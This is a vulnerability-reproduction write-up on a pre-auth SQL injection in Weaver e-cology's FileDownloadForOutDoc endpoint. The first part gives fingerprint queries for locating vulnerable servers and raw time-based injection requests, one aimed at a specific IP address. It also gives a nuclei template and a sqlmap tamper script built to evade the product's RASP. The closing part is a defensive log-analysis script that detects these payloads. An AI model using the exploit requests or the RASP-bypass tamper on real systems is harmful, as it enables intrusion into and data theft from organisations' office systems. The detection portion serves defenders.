[Vulnerability Reproduction] Weaver (泛微) e-cology FileDownloadForOutDoc pre-auth SQL injection

Lately hw has also been exposing lots and lots of vulnerabilities, and it makes this exam-prepping student itch to play. We can't get our hands on 0days, but can't we at least play with some high-frequency ones? So I collected thirty-odd commonly used vulnerabilities from 2023 to reproduce one by one, whenever there's free time. Right now I am also learning C while preparing for the graduate entrance exam; after the exam I will probably keep digging into technology, mainly in two directions, malware development and analysis, and web security. Of course nothing is settled yet (who knows, I might end up playing with web3). Wishing myself success in getting into grad school this year.

Affected versions

Ecology 9.x patch version < 10.58.0

Ecology 8.x patch version < 10.58.0

Search syntax (fingerprint)

app.name="泛微 e-cology 9.0 OA"

app.name="泛微 e-cology OA"

app="泛微-协同商务系统"

PoC
POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: 101.230.160.27:8885
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "AyurgkJJwkD"
If-Modified-Since: Sat, 15 Oct 2022 01:55:58 GMT
Connection: close
Content-Length: 47

fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1

Because Weaver OA has RASP enabled, sending the same request twice gets intercepted, so a random element has to be added to the request body; a short introduction to RASP follows.

RASP stands for Runtime Application Self-Protection, a security technology for shielding applications from attacks. It performs security detection and protection while the application is running, and can be implemented inside the application itself or in components tightly integrated with it.

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
Content-Length: 45
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

fileid={random}+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1

The nuclei PoC is as follows:

id: ecology-oa-filedownloadforoutdoc-sqli

info:
  name: EcologyOA filedownloadforoutdoc - SQL injection
  author: unknown
  severity: critical
  description: EcologyOA filedownloadforoutdoc interface has SQL injection
  tags: ecology-oa,sqli

requests:
  - raw:
      - |
        POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'

Tamper script (for sqlmap)

import random

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGH


def dependencies():
    pass


def tamper(payload, **kwargs):
    """
    Prepend a random integer to every payload so that no two requests sent
    by sqlmap are byte-identical; the RASP rule described above only blocks
    a request when the identical one has already been seen.
    """
    if not payload:
        return payload
    ran = random.randint(1, 2 ** 20)
    return str(ran) + payload
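The post makes two points worth turning into a check on the defender's side: the RASP only intercepts a request whose body it has already seen, and the tamper script above gets past that by prefixing random digits, so every request looks new. The script below is an added example written for this page (it is not code from the post or from Weaver) that inspects request logs for the download endpoint in a way that does not depend on request identity: it decodes the form body the way the application's parameter parser would and requires `fileid` to be a plain integer, flagging any time-delay primitive or other non-numeric value regardless of what precedes it. It also models the exact-repeat rule so the difference is visible on the same input. The log line format (client, method, path, body) and the sample lines are constructed for the example; the regular expression adds the MySQL, PostgreSQL and Oracle delay functions next to the SQL Server `WAITFOR DELAY` the post uses.

```python
import re
from urllib.parse import parse_qs

# Endpoint from the post. The version note in the post says the fix ships
# in patch >= 10.58.0; this script only helps spot attempts in logs.
TARGET_PATH = "/weaver/weaver.file.FileDownloadForOutDoc"

# Time-based SQL injection primitives. WAITFOR DELAY (SQL Server) is what
# the post's requests use; the other engines' equivalents are my addition.
TIME_BASED = re.compile(
    r"\b(WAITFOR\s+DELAY|SLEEP\s*\(|PG_SLEEP\s*\(|DBMS_LOCK\.SLEEP)", re.I
)

# Constructed sample log lines (assumed format: "client method path body").
SAMPLE_LOG = """\
10.0.0.5 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=512&isFromOutImg=1
10.0.0.9 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1
10.0.0.9 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=512+WAITFOR+DELAY+'0:0:8'&isFromOutImg=1
10.0.0.9 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=948113512+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1
10.0.0.9 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=203499512+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1
10.0.0.7 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=512%27&isFromOutImg=1
10.0.0.7 POST /weaver/weaver.file.FileDownloadForOutDoc fileid=77&isFromOutImg=1
"""


def parse_line(line):
    """Split one constructed log line into its fields; None if malformed."""
    parts = line.split(" ", 3)
    if len(parts) != 4:
        return None
    client, method, path, body = parts
    # parse_qs turns '+' into a space and decodes %XX, so the checks below
    # see the value the way the application's parameter parser would.
    params = parse_qs(body, keep_blank_values=True)
    return {"client": client, "method": method, "path": path,
            "body": body, "params": params}


def classify(entry):
    """
    Verdict for one request:
      'ok'              - fileid is a plain integer
      'time_based_sqli' - fileid carries a time-delay primitive
      'non_numeric_id'  - fileid is not an integer (catches other probes too)
      'other_path'      - not the endpoint under discussion
    """
    if entry["path"] != TARGET_PATH:
        return "other_path"
    fileid = entry["params"].get("fileid", [""])[0]
    if fileid.isdigit():
        return "ok"
    if TIME_BASED.search(fileid):
        return "time_based_sqli"
    return "non_numeric_id"


def exact_repeat_hits(entries):
    """
    Model the exact-repeat rule the post attributes to the RASP: a request
    counts only when an identical body was already seen. Random prefixes
    make every body unique, so this rule misses them.
    """
    seen, hits = set(), 0
    for e in entries:
        if e["body"] in seen:
            hits += 1
        seen.add(e["body"])
    return hits


def analyze(log_text):
    """Run both checks over a log and return a summary dict."""
    entries = [e for e in map(parse_line, log_text.splitlines()) if e]
    verdicts = [classify(e) for e in entries]
    injected = [e for e, v in zip(entries, verdicts) if v == "time_based_sqli"]
    return {
        "total": len(entries),
        "time_based_sqli": verdicts.count("time_based_sqli"),
        "non_numeric_id": verdicts.count("non_numeric_id"),
        "exact_repeat_hits": exact_repeat_hits(entries),
        "attacking_clients": sorted({e["client"] for e in injected}),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

On the sample input the parameter check flags all four delay payloads plus the stray-quote probe, while the exact-repeat rule fires once, only for the one request that was literally re-sent. The same integer check belongs in the application itself: a download handler that parses `fileid` as an integer before it reaches a query has nothing left to inject into, which is the property a patch for this class of bug has to restore.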